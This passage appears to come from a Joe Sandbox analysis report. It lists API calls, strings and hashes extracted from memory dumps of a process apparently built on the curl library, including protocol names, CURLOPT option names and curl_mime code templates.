                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: freestrtok$_strdup
                                                                                                                                                                                                                                                            • String ID: all$dict$file$ftp$ftps$gopher$http$https$imap$imaps$ldap$ldaps$pop3$pop3s$rtsp$scp$sftp$smb$smbs$smtp$smtps$telnet$tftp$unrecognized protocol '%s'
                                                                                                                                                                                                                                                            • API String ID: 1031179057-350857173
                                                                                                                                                                                                                                                            • Opcode ID: e075a22e6b2d96f25f68b538c67d1ad3aea9885e408a9a725218603e6ae5c9f4
                                                                                                                                                                                                                                                            • Instruction ID: 80573d5d1ac9a06967edc6a04ceda5f667186f6dccff79201a241413a56661fc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e075a22e6b2d96f25f68b538c67d1ad3aea9885e408a9a725218603e6ae5c9f4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E71A3E0A7030722EF147D702C66B2F295D8A5135DF160837FC06EA3C3FAA9DD284669
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmp$CountTickfopenlocaltimetime
                                                                                                                                                                                                                                                            • String ID: %02d:%02d:%02d.%06ld $%02x $%04zx: $%s%s $%s%s, %zu bytes (0x%zx)$%s== Info: %s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$>{}$Failed to create/open output$Qh)!L$[%zu bytes data]
                                                                                                                                                                                                                                                            • API String ID: 1854772924-3005902295
                                                                                                                                                                                                                                                            • Opcode ID: aa91eaca6464f1970bb108bdae9c28353a05c1ffeeedf59d748c88a667d80c7b
                                                                                                                                                                                                                                                            • Instruction ID: 3fcc77591efb529121dbaf03e3c462f281bd6fd0ebfd5e8accece5fba6a8ed66
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa91eaca6464f1970bb108bdae9c28353a05c1ffeeedf59d748c88a667d80c7b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86C166B0928305AFDB24DF54CC45B6777E9AB84304F14082EF94587242E7F5D8B9CBAA
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fflushfwritememchr
                                                                                                                                                                                                                                                            • String ID: %.*s:$Content-disposition:$Failed to rename %s -> %s: %s$filename=
                                                                                                                                                                                                                                                            • API String ID: 2783944976-1855582235
                                                                                                                                                                                                                                                            • Opcode ID: 828b11ec0db3d035f150d0cd6d827d403a43f41a06ef7d372c7a38057c8b5413
                                                                                                                                                                                                                                                            • Instruction ID: 7cf2c4b68792af871a1b28ea8a6d6ceb5dd1c36dd687afb34de6d9c10d581a8a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 828b11ec0db3d035f150d0cd6d827d403a43f41a06ef7d372c7a38057c8b5413
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17B104F1A103426FEB259E259C81BAB77A8AF50308F080469FC4997252F775ED34C7A2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023A201
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0023A233
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023A24C
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0023AF92
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023B116
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023B12A
                                                                                                                                                                                                                                                            • _close.MSVCRT ref: 0023B145
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E274
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 0024029F
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402B5
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402CB
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402E1
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402F7
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 0024030D
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 00240323
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 00240339
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: free.MSVCRT ref: 002404BD
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E305
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E32F
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E341
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E353
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$strcmp$fclose$_close
                                                                                                                                                                                                                                                            • String ID: (%d) Failed writing body$CURLOPT_ACCEPT_ENCODING$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTP_VERSION$CURLOPT_MAXREDIRS$CURLOPT_POSTREDIR$CURLOPT_PROXYHEADER$CURLOPT_TRANSFER_ENCODING$P"-$t-h{M$t70$Hj
                                                                                                                                                                                                                                                            • API String ID: 3512857261-2744182954
                                                                                                                                                                                                                                                            • Opcode ID: 6816fd2cc7a1f50a08fa9a6bf83786d969a3536e31aac0605795dd90a6e1c96f
                                                                                                                                                                                                                                                            • Instruction ID: 5bac38be0aadb34d25735667edd24912050a835923548c151914269d50aecd11
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6816fd2cc7a1f50a08fa9a6bf83786d969a3536e31aac0605795dd90a6e1c96f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34C1BFF06183429BEB249F10CC46B5BB7E1AF80708F14482DF989972A1E775DC68DB43
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • curl_mime_filename(part%d, NULL);, xrefs: 002400D6
                                                                                                                                                                                                                                                            • curl_mime_name(part%d, "%s");, xrefs: 0023FF87
                                                                                                                                                                                                                                                            • curl_mime_headers(part%d, slist%d, %d);, xrefs: 0024000E
                                                                                                                                                                                                                                                            • curl_mime_filedata(part%d, "%s");, xrefs: 0023FDFC
                                                                                                                                                                                                                                                            • curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 002400A4
                                                                                                                                                                                                                                                            • curl_mime_type(part%d, "%s");, xrefs: 0023FFCA
                                                                                                                                                                                                                                                            • (curl_seek_callback) fseek, NULL, stdin);, xrefs: 0023FE4A
                                                                                                                                                                                                                                                            • curl_mime_subparts(part%d, mime%d);, xrefs: 0023FE93
                                                                                                                                                                                                                                                            • curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 0023FE30
                                                                                                                                                                                                                                                            • slist%d = NULL;, xrefs: 00240033
                                                                                                                                                                                                                                                            • curl_mime_data(part%d, "%s", %I64d);, xrefs: 0023FDB7
                                                                                                                                                                                                                                                            • curl_mime_encoder(part%d, "%s");, xrefs: 0023FEFD
                                                                                                                                                                                                                                                            • mime%d = curl_mime_init(hnd);, xrefs: 0023FC8B
                                                                                                                                                                                                                                                            • curl_mime *mime%d;, xrefs: 0023FC59
                                                                                                                                                                                                                                                            • mime%d = NULL;, xrefs: 0023FC73, 0023FCD0, 0023FEAE
                                                                                                                                                                                                                                                            • part%d = curl_mime_addpart(mime%d);, xrefs: 0023FD21
                                                                                                                                                                                                                                                            • curl_mime_free(mime%d);, xrefs: 0023FCA3
                                                                                                                                                                                                                                                            • curl_mime_filename(part%d, "%s");, xrefs: 0023FF44
                                                                                                                                                                                                                                                            • curl_mimepart *part%d;, xrefs: 0023FCF4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$strcmp
                                                                                                                                                                                                                                                            • String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime *mime%d;$curl_mime_data(part%d, "%s", %I64d);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_free(mime%d);$curl_mime_headers(part%d, slist%d, %d);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$curl_mimepart *part%d;$mime%d = NULL;$mime%d = curl_mime_init(hnd);$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
                                                                                                                                                                                                                                                            • API String ID: 507678545-2381200950
                                                                                                                                                                                                                                                            • Opcode ID: 8f5f5f9a80d28ff5039a9c8b7160e32fb57539ee4f7a78fcdcd2da91ab5a1dca
                                                                                                                                                                                                                                                            • Instruction ID: 14265bba996f7b529b08107469e0e2aa82d060b7780b5d9623e2e57ae4aacd20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f5f5f9a80d28ff5039a9c8b7160e32fb57539ee4f7a78fcdcd2da91ab5a1dca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4C148F1A20346ABDB14EF64AD82B2A7799AF00344F14053BFD1492382F375CEB48B56
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • <, xrefs: 0023AA4A
                                                                                                                                                                                                                                                            • P"-, xrefs: 0023E318
                                                                                                                                                                                                                                                            • t70, xrefs: 0023B183
                                                                                                                                                                                                                                                            • (%d) Failed writing body, xrefs: 0023AFC9
                                                                                                                                                                                                                                                            • bad output glob!, xrefs: 0023E1E7
                                                                                                                                                                                                                                                            • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentione, xrefs: 0023AA3D
                                                                                                                                                                                                                                                            • curl: (%d) %s, xrefs: 0023AA19
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_strdupfclosefwritestrcmp
                                                                                                                                                                                                                                                            • String ID: (%d) Failed writing body$<$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentione$P"-$bad output glob!$curl: (%d) %s$t70
                                                                                                                                                                                                                                                            • API String ID: 97970600-567622460
                                                                                                                                                                                                                                                            • Opcode ID: dc42a4647772d8baa101d78913667f39fc59283bd73adbeb67191598919b90c1
                                                                                                                                                                                                                                                            • Instruction ID: 9a70d7f94c8b15d70f036565aa24580fc4c9db1536c2ef0525b074c7d058edc1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc42a4647772d8baa101d78913667f39fc59283bd73adbeb67191598919b90c1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3A18FF1A183419BEB249F25C845B5BB7E4AF80308F04486DF88957291E77AD968CF93
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$strcmp$_strdupfclose$_close_fileno_isattyfwritestrchrstrrchrstrstr
                                                                                                                                                                                                                                                            • String ID: (%d) Failed writing body$P"-$bad output glob!$t70$9
                                                                                                                                                                                                                                                            • API String ID: 4284395340-3740193650
                                                                                                                                                                                                                                                            • Opcode ID: b8707260f4a5a1d51780727f0c18aef0d443b32f8e53be26c37efd3bbbaeb8bb
                                                                                                                                                                                                                                                            • Instruction ID: 398239bf6527d466c11af9594e58360ae5c9f0cb29fecce6dc2c971f9aad9199
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8707260f4a5a1d51780727f0c18aef0d443b32f8e53be26c37efd3bbbaeb8bb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B16FF09183418FEB249F25C85575BBBE4BF80308F14492DE58987291E77AD968CF93
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sscanfstrlen
                                                                                                                                                                                                                                                            • String ID: %255[^:]:%d$%s:%d$*$@*sv$Added %s:%d:%s to DNS cache$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!$RESOLVE %s:%d is - old addresses discarded!$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal!
                                                                                                                                                                                                                                                            • API String ID: 2693918933-850063647
                                                                                                                                                                                                                                                            • Opcode ID: bc55fe68375a3dbfb200029f0039cd88b352e035d0df85a62d3e2956a7c85e14
                                                                                                                                                                                                                                                            • Instruction ID: 5d684d8351ad2746d621213030294b9f079adba12076dd9bf274e9525e373eb6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc55fe68375a3dbfb200029f0039cd88b352e035d0df85a62d3e2956a7c85e14
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB138B1914341ABDF25AF209C45B6B77A89F50305F094879FC8896243F7B5CA38CBA7
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmp$free
                                                                                                                                                                                                                                                            • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$CURLOPT_PROXY_SSL_VERIFYHOST$CURLOPT_PROXY_SSL_VERIFYPEER$CURLOPT_SOCKS5_AUTH$CURLOPT_SSL_ENABLE_ALPN$CURLOPT_SSL_ENABLE_NPN$CURLOPT_SSL_VERIFYHOST$CURLOPT_SSL_VERIFYPEER$CURLOPT_TCP_NODELAY$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                                                                                                                                                                                                                                                            • API String ID: 3401341699-411265327
                                                                                                                                                                                                                                                            • Opcode ID: 27a055fa24a5f0c87e54dd9b255c0257202170173db9e9494118132c4adfebd0
                                                                                                                                                                                                                                                            • Instruction ID: 282e2f9224b1e0469db89a02c1fe792c5144afb7f712c312f165e2a4889f2370
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27a055fa24a5f0c87e54dd9b255c0257202170173db9e9494118132c4adfebd0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98514B71A243015BDB28AE259D81AAB76D88F44344F05447FFF48D3381FA79DDB086AB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • <, xrefs: 0023AA4A
                                                                                                                                                                                                                                                            • P"-, xrefs: 0023E318
                                                                                                                                                                                                                                                            • t70, xrefs: 0023B183
                                                                                                                                                                                                                                                            • (%d) Failed writing body, xrefs: 0023AFC9
                                                                                                                                                                                                                                                            • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentione, xrefs: 0023AA3D
                                                                                                                                                                                                                                                            • curl: (%d) %s, xrefs: 0023AA19
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_strdupfclose$_closefwrite
